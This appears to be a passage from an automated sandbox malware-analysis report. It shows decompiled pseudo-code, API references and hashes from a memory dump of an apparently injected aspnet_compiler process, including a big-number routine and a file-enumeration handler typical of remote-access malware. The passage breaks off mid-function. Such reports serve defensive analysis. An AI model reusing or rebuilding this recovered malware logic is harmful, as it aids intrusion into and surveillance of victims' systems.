                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                • String ID: m3D
                • API String ID: 1084509184-982802904
                • Opcode ID: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                • Instruction ID: 5dea69f9d697fc4293d0711e1b08fce8c3201d78217ba2bcd737ffac06997e55
                • Opcode Fuzzy Hash: 26991cba7bbc86e1919f10754b8b785b2ecdf25adbba73174a712f5d5bc6d13d
                • Instruction Fuzzy Hash: A5F0283A3003055FDB146F359C81A66BB95EF81759F15883EFD418B642D675AC018744
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044716D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00442DCB,?,00000004), ref: 004471C0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InfoLocale
                • String ID: GetLocaleInfoEx
                • API String ID: 2299586839-2904428671
                • Opcode ID: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                • Instruction ID: 1399f742e217acd12c1245ecdfc534ed39672f07150ba9ee3c651a9906310cab
                • Opcode Fuzzy Hash: 2c80f62870bc465dbeaf3c9209bb9ced0744fbcbc410adbe038e870c8c2fc236
                • Instruction Fuzzy Hash: 3BF0F031A44208BBDB11AF61DC06F6E7F65EF08701F00406AFC0966292CB798E15DAAE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00444AF0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 90%
                			E00444AF0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffff0faa
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00456040(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00455CC0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00455AC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00455AC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x453b48
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00455CC0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00453D75(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00453D75(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00453D75(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                0x00444afc
                0x00444aff
                0x00444b03
                0x00444b0d
                0x00444b10
                0x00444b12
                0x00444b14
                0x00444b21
                0x00444b21
                0x00444b24
                0x00444b24
                0x00444b27
                0x00444b2a
                0x00444b2c
                0x00444c5f
                0x00444c61
                0x00444caa
                0x00444cae
                0x00444cb4
                0x00444c63
                0x00444c65
                0x00444c68
                0x00444c6a
                0x00444c6d
                0x00444c6f
                0x00444c71
                0x00444ca5
                0x00444ca5
                0x00444ca5
                0x00444c73
                0x00444c78
                0x00444c7e
                0x00444c7e
                0x00444c81
                0x00444c83
                0x00444c85
                0x00000000
                0x00000000
                0x00444c87
                0x00444c88
                0x00444c8b
                0x00444c8e
                0x00444c90
                0x00000000
                0x00444c92
                0x00000000
                0x00444c92
                0x00000000
                0x00444c90
                0x00444c94
                0x00444c9b
                0x00444c9f
                0x00444ca3
                0x00000000
                0x00000000
                0x00444ca3
                0x00444ca6
                0x00444ca6
                0x00444ca8
                0x00444cb5
                0x00444cb8
                0x00444cbb
                0x00444cbe
                0x00444cbe
                0x00444cc2
                0x00444cc5
                0x00444cc8
                0x00444ccb
                0x00444cd6
                0x00444ccd
                0x00444cd2
                0x00444cd2
                0x00444ce0
                0x00444ce5
                0x00444ce8
                0x00444cea
                0x00444cf4
                0x00444cf7
                0x00444cfe
                0x00444d01
                0x00444d04
                0x00444d0c
                0x00444d12
                0x00444d12
                0x00444d12
                0x00444d12
                0x00444d04
                0x00444d17
                0x00444d1e
                0x00444d1e
                0x00444d21
                0x00444d24
                0x00444f56
                0x00444f56
                0x00444d2a
                0x00444d2a
                0x00444d30
                0x00444d33
                0x00444d36
                0x00444d39
                0x00444d3c
                0x00444d3f
                0x00444d42
                0x00444d42
                0x00444d45
                0x00444d4c
                0x00444d4c
                0x00444d47
                0x00444d47
                0x00444d47
                0x00444d4e
                0x00444d52
                0x00444d55
                0x00444d57
                0x00444d5a
                0x00444d61
                0x00444d64
                0x00444d67
                0x00444d72
                0x00444d75
                0x00444d7a
                0x00444d7f
                0x00444d86
                0x00444d8b
                0x00444d8d
                0x00444d8f
                0x00444d93
                0x00444d96
                0x00444d99
                0x00444da1
                0x00444daa
                0x00444daa
                0x00444dac
                0x00444daf
                0x00444daf
                0x00444d99
                0x00444db9
                0x00444dbe
                0x00444dc3
                0x00444dc5
                0x00444dc8
                0x00444dca
                0x00444dcd
                0x00444dd0
                0x00444dd2
                0x00444dd5
                0x00444dd8
                0x00444dda
                0x00444de1
                0x00444de6
                0x00444de9
                0x00444df3
                0x00444df5
                0x00444df7
                0x00444dfa
                0x00444dfa
                0x00444dfc
                0x00444dff
                0x00444e02
                0x00444e05
                0x00444e08
                0x00444ddc
                0x00444ddc
                0x00444ddf
                0x00000000
                0x00000000
                0x00444ddf
                0x00444e0b
                0x00444e0d
                0x00444e0f
                0x00000000
                0x00444e11
                0x00444e11
                0x00444e14
                0x00444e16
                0x00444e16
                0x00444e24
                0x00444e27
                0x00444e2c
                0x00444e2e
                0x00000000
                0x00000000
                0x00444e30
                0x00444e37
                0x00444e37
                0x00444e3a
                0x00444e3d
                0x00444e40
                0x00444e43
                0x00444e43
                0x00444e46
                0x00444e49
                0x00444e4d
                0x00444e50
                0x00444e52
                0x00444e55
                0x00000000
                0x00000000
                0x00444e57
                0x00444e55
                0x00444e32
                0x00444e32
                0x00444e35
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00444e35
                0x00444e5c
                0x00444e5c
                0x00000000
                0x00444e5c
                0x00444e59
                0x00000000
                0x00444e59
                0x00444e14
                0x00444e0f
                0x00444e5f
                0x00444e5f
                0x00444e61
                0x00444e6b
                0x00444e6b
                0x00444e6e
                0x00444e70
                0x00444e72
                0x00444e74
                0x00444e79
                0x00444e7c
                0x00444e7c
                0x00444e7f
                0x00444e82
                0x00444e85
                0x00444e87
                0x00444e9c
                0x00444e9e
                0x00444ea0
                0x00444ea2
                0x00444ea4
                0x00444ea6
                0x00444ea8
                0x00444eaa
                0x00444ead
                0x00444ead
                0x00444eb1
                0x00444eb3
                0x00444eb9
                0x00444ebc
                0x00444ebc
                0x00444ebc
                0x00444ec0
                0x00444ec0
                0x00444ec5
                0x00444ec8
                0x00444ec8
                0x00444ecd
                0x00444ecf
                0x00444ed1
                0x00444ed8
                0x00444ed8
                0x00444eda
                0x00444edf
                0x00444ee1
                0x00444ee4
                0x00444ee4
                0x00444ee7
                0x00444ef0
                0x00444ef0
                0x00444ef2
                0x00444ef2
                0x00444ef7
                0x00444efd
                0x00444f01
                0x00444f04
                0x00444f07
                0x00444f09
                0x00444f09
                0x00444f09
                0x00444f0e
                0x00444f0e
                0x00444f11
                0x00444f14
                0x00444ed3
                0x00444ed3
                0x00444ed6
                0x00000000
                0x00000000
                0x00444ed6
                0x00444ed1
                0x00444f1b
                0x00444f1b
                0x00444f1c
                0x00444e63
                0x00444e63
                0x00444e65
                0x00000000
                0x00000000
                0x00444e65
                0x00444f2c
                0x00444f31
                0x00444f34
                0x00444f38
                0x00444f39
                0x00444f3c
                0x00444f3f
                0x00444f40
                0x00444f43
                0x00444f46
                0x00444f49
                0x00444f4c
                0x00444f4c
                0x00444f54
                0x00444f5b
                0x00444f5c
                0x00444f5e
                0x00444f60
                0x00444f62
                0x00444f65
                0x00444f70
                0x00444f70
                0x00444f76
                0x00444f76
                0x00444f79
                0x00444f7a
                0x00444f7a
                0x00444f70
                0x00444f7e
                0x00444f80
                0x00444f82
                0x00444f84
                0x00444f84
                0x00444f86
                0x00444f8a
                0x00000000
                0x00000000
                0x00444f8c
                0x00444f8c
                0x00444f8f
                0x00444f91
                0x00000000
                0x00000000
                0x00000000
                0x00444f91
                0x00444f84
                0x00444f93
                0x00444f9d
                0x00000000
                0x00000000
                0x00000000
                0x00444ca8
                0x00444b32
                0x00444b32
                0x00444b32
                0x00444b35
                0x00444b38
                0x00444b3b
                0x00444b6c
                0x00444b6e
                0x00444bb9
                0x00444bbb
                0x00444bc2
                0x00444bc9
                0x00444bcc
                0x00444bcf
                0x00444bd5
                0x00444bd5
                0x00444bd6
                0x00444bd9
                0x00444be0
                0x00444be9
                0x00444bee
                0x00444bf1
                0x00444bf6
                0x00444bf9
                0x00444bfb
                0x00444c00
                0x00444c03
                0x00444c06
                0x00444c06
                0x00444c06
                0x00444c0a
                0x00444c0d
                0x00444c0d
                0x00444c12
                0x00444c12
                0x00444c1d
                0x00444c28
                0x00444c28
                0x00444c2b
                0x00444c37
                0x00444c3c
                0x00444c47
                0x00444c49
                0x00444c4b
                0x00444c51
                0x00444c56
                0x00444c58
                0x00444c5e
                0x00444b70
                0x00444b7c
                0x00444b7c
                0x00444b7f
                0x00444b8f
                0x00444b95
                0x00444b9c
                0x00444b9e
                0x00444ba6
                0x00444ba8
                0x00444baa
                0x00444baf
                0x00444bb2
                0x00444bb8
                0x00444bb8
                0x00444b3d
                0x00444b40
                0x00444b44
                0x00444b4a
                0x00444b59
                0x00444b63
                0x00444b6b
                0x00444b6b
                0x00444b3b
                0x00444b16
                0x00444b19
                0x00444b1f
                0x00444b1f
                0x00444b05
                0x00444b0b
                0x00444b0b

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1785a8c4125c163fcd88b916b3e193c1c79f1356aa0cd0dcf8c48ed4e17e045f
                • Instruction ID: d4bb78e3d38a29ffe1297b84693c927112aa50585de5b24583ca26fbc7ad4fc8
                • Opcode Fuzzy Hash: 1785a8c4125c163fcd88b916b3e193c1c79f1356aa0cd0dcf8c48ed4e17e045f
                • Instruction Fuzzy Hash: 8D022C71E002199BEF14CFA9C8807AEB7F1FF88314F25816AD919E7385D734AE458B94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00418650 Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00418650(char* __edx, void* __eflags, char _a8) {
				struct _WIN32_FIND_DATAW _v1028;
				char _v1036;
				char _v1064;
				char _v1088;
				void* _v1092;
				char _v1100;
				char _v1116;
				void* _v1120;
				char _v1128;
				char _v1136;
				char _v1152;
				char _v1156;
				char _v1160;
				void* _v1164;
				char _v1172;
				char _v1176;
				void* _v1188;
				char _v1196;
				void* _v1200;
				void* _v1204;
				char _v1208;
				char _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				char _v1236;
				char _v1240;
				char _v1252;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t63;
				int _t85;
				int _t91;
				void* _t102;
				void* _t109;
				char* _t113;
				void* _t115;
				void* _t116;
				void* _t130;
				void* _t133;
				void* _t228;
				void* _t229;
				void* _t234;
				signed int _t235;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t243;

				_t243 = __eflags;
				_t213 = __edx;
				_push(_t139);
				_t63 = E00401F8B( &_a8);
				E00404182( &_a8,  &_v1100, 4, 0xffffffff);
				_t238 = (_t235 & 0xfffffff8) - 0x4b4;
				E004020D6(_t139, _t238, __edx, _t243, 0x472ec8);
				_t239 = _t238 - 0x18;
				E004020D6(_t139, _t239, __edx, _t243,  &_v1116);
				E0041A976( &_v1252, _t213);
				_t240 = _t239 + 0x30;
				_t228 =  *_t63 - 0x19;
				if(_t228 == 0) {
					E004020BF(_t139,  &_v1220);
					_t213 = 0x473618;
					E004087F0( &_v1172, 0x473618, _t234, L"\\*");
					_t229 = FindFirstFileW(E00401EE4( &_v1172),  &_v1028);
					__eflags = _t229 - 0xffffffff;
					if(__eflags == 0) {
						L14:
						E004020D6(_t139, _t240 - 0x18, _t213, __eflags,  &_v1220);
						_push(0x5d);
						E00404A81(0x4737a0, _t213, __eflags);
						E00401EE9();
						E00401FB8();
						goto L15;
					}
					E0040415E(_t139,  &_v1196, 0x473618, _t234,  &(_v1028.cFileName));
					_t213 = 0x4644f0;
					_t85 = E00406E2B(__eflags);
					_t139 = _t85;
					E00401EE9();
					__eflags = _t85;
					if(__eflags != 0) {
						E00401FC2( &_v1228, 0x4644f0, _t229, E00402097(_t139,  &_v1196, 0x4644f0, _t234, __eflags,  &_v1028, 0x250));
						E00401FB8();
					}
					while(1) {
						__eflags = FindNextFileW(_t229,  &_v1028);
						if(__eflags == 0) {
							goto L14;
						}
						E0040415E(_t139,  &_v1196, _t213, _t234,  &(_v1028.cFileName));
						_t213 = L"..";
						_t91 = E00406E2B(__eflags);
						_t139 = _t91;
						E00401EE9();
						__eflags = _t91;
						if(__eflags != 0) {
							L00403356(E00402097(_t139,  &_v1196, L"..", _t234, __eflags,  &_v1028, 0x250));
							E00401FB8();
						}
					}
					goto L14;
				} else {
					_t245 = _t228 == 1;
					if(_t228 == 1) {
						_t102 = E0041A7B9( &_v1152, E00401E45( &_v1232, _t213, _t234, _t245, 1));
						E00402F85( &_v1176, E004087F0( &_v1128, 0x473618, _t234, "\\"), _t102);
						E00401EE9();
						E00401EE9();
						E004020BF(_t139,  &_v1224);
						E00401EE4( &_v1176);
						_t213 =  &_v1224;
						_t109 = E0041ADFE( &_v1224);
						_t246 = _t109;
						if(_t109 != 0) {
							_t113 = E00401F8B(E00401E45(0x473298,  &_v1224, _t234, _t246, 0x1b));
							_t247 =  *_t113 - 1;
							if( *_t113 == 1) {
								_t130 = E0040245C();
								E0040632B( &_v1028, E00401F8B(0x473280), _t130);
								_t133 = E0040245C();
								E00401FC2( &_v1240, _t213, 0x473280, E0040644C(_t139,  &_v1036, _t213,  &_v1156, E00401F8B( &_v1228), _t133));
								E00401FB8();
							}
							_t115 = E00401E45( &_v1232, _t213, _t234, _t247, 2);
							_t116 = E00401E45( &_v1236, _t213, _t234, _t247, 0);
							_t213 = E00402EF0(_t139,  &_v1160, E00402EF0(_t139,  &_v1136, E00402EF0(_t139,  &_v1088, E00402EF0(_t139,  &_v1064, E00402F11( &_v1208, E00401E45( &_v1240, _t213, _t234, _t247, 1), _t234, 0x472ec8), _t234, _t247, _t116), _t234, _t247, 0x472ec8), _t234, _t247, _t115), _t234, _t247, 0x472ec8);
							E00402EF0(_t139, _t240 - 0x18, _t122, _t234, _t247,  &_v1220);
							_push(0x5e);
							E00404A81(0x4737a0, _t122, _t247);
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
						}
						E00401FB8();
						E00401EE9();
					}
					L15:
					E00401E6D( &_v1232, _t213);
					E00401FB8();
					return E00401FB8();
				}
			}




















































                0x00418650
                0x00418650
                0x0041865f
                0x00418662
                0x00418678
                0x0041867d
                0x00418688
                0x0041868d
                0x0041869a
                0x004186a3
                0x004186a8
                0x004186ab
                0x004186ae
                0x0041887b
                0x00418885
                0x0041888e
                0x004188ac
                0x004188ae
                0x004188b1
                0x00418978
                0x00418982
                0x00418987
                0x0041898e
                0x00418997
                0x004189a0
                0x00000000
                0x004189a0
                0x004188c3
                0x004188c8
                0x004188cf
                0x004188d8
                0x004188da
                0x004188df
                0x004188e1
                0x004188fe
                0x00418907
                0x00418907
                0x00418969
                0x00418974
                0x00418976
                0x00000000
                0x00000000
                0x00418920
                0x00418925
                0x0041892c
                0x00418935
                0x00418937
                0x0041893c
                0x0041893e
                0x0041895b
                0x00418964
                0x00418964
                0x0041893e
                0x00000000
                0x004186b4
                0x004186b4
                0x004186b7
                0x004186ce
                0x004186f1
                0x004186fb
                0x00418704
                0x0041870d
                0x00418716
                0x0041871b
                0x00418721
                0x00418726
                0x00418728
                0x0041873c
                0x00418741
                0x00418744
                0x0041874d
                0x00418762
                0x0041876b
                0x00418791
                0x0041879a
                0x0041879a
                0x004187b0
                0x004187bd
                0x00418817
                0x0041881b
                0x00418821
                0x00418828
                0x00418831
                0x0041883a
                0x00418846
                0x00418852
                0x0041885b
                0x0041885b
                0x00418864
                0x0041886d
                0x0041886d
                0x004189a5
                0x004189a9
                0x004189b5
                0x004189c8
                0x004189c8

                APIs
                • FindFirstFileW.KERNEL32(00000000,?), ref: 004188A6
                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418972
                  • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$Find$CreateFirstNext
                • String ID:
                • API String ID: 341183262-0
                • Opcode ID: 91937f40c01ea410f094f55ffba3d5842e82071e299bfae1d30aaf5aaec0e015
                • Instruction ID: 4e170b996662dc82c888af41f7fe9c50681d869d22ff8177fab8d840ae628c7b
                • Opcode Fuzzy Hash: 91937f40c01ea410f094f55ffba3d5842e82071e299bfae1d30aaf5aaec0e015
                • Instruction Fuzzy Hash: C68162715082415BC314FB62C896DEFB3A9AF90308F50493FF546631E2EF389A49C69E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406EB0 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00406EB0(char _a4) {
				void* _v16;
				struct _WIN32_FIND_DATAW _v596;
				char _v620;
				void* _v632;
				char _v644;
				void* _v648;
				char _v652;
